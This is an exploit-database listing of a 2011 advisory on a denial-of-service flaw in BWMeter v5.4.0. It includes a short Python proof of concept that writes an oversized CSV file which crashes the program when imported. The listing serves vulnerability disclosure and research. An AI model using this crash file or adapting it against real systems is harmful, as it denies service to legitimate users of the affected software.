Lucene search
K

BWMeter v5.4.0 (.csv) Denial of Service Vulnerability

🗓️ 18 Feb 2011 00:00:00Reported by b0telh0Type 
zdt
 zdt
🔗 0day.today👁 15 Views

BWMeter v5.4.0 (.csv) Denial of Service Vulnerability. Bandwidth meter, traffic controller, firewall affected by denial of service. Affected version: v5.4.0

Code
GotGeek Labs
http://www.gotgeek.com.br/
 
BWMeter v5.4.0 (.csv) Denial of Service
 
 
 
[+] Description
 
BWMeter is a powerful bandwidth meter, monitor, traffic controller and
firewall, which measures, displays and controls all traffic to/from your
computer or on your network.
 
 
 
[+] Information
 
Title: BWMeter v5.4.0 (.csv) Denial of Service
Advisory: gg-002-2011
Date: 02-14-2011
Last update: 02-16-2011
Link: http://www.gotgeek.com.br/pocs/gg-002-2011.txt
Tested on: Windows XP SP3
 
 
 
[+] Vulnerability
 
BWMeter is affected by denial of service vulnerability.
Successful exploitation of the vulnerability allows an attacker to crash the
vulnerable application, denying service to legitimate users.
 
Affected Versions:
BWMeter v5.4.0
 
Other versions may also be vulnerable.
 
 
 
[+] Proof of Concept/Exploit
 
#!/usr/bin/python
#
 
 
junk = "\x47\x47" * 2500
 
try:
    file = open('b0t.csv','w');
    file.write(junk);
    file.close();
    print "\n[*] gotgeek labs"
    print "[*] http://gotgeek.com.br\n"
    print "[+] b0t.csv created."
    print "[+] Open BWMeter.exe..."
    print "[+] Statistics >> Import"
    print "[+] and Select b0t.csv\n"
except:
    print "\n[-] Error.. Can't write file to system.\n"
 
 
 
[+] References
 
http://www.desksoft.com/BWMeter.htm
 
 
 
[+] Credits
 
b0telh0



#  0day.today [2018-03-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Feb 2011 00:00Current
7High risk
Vulners AI Score7
15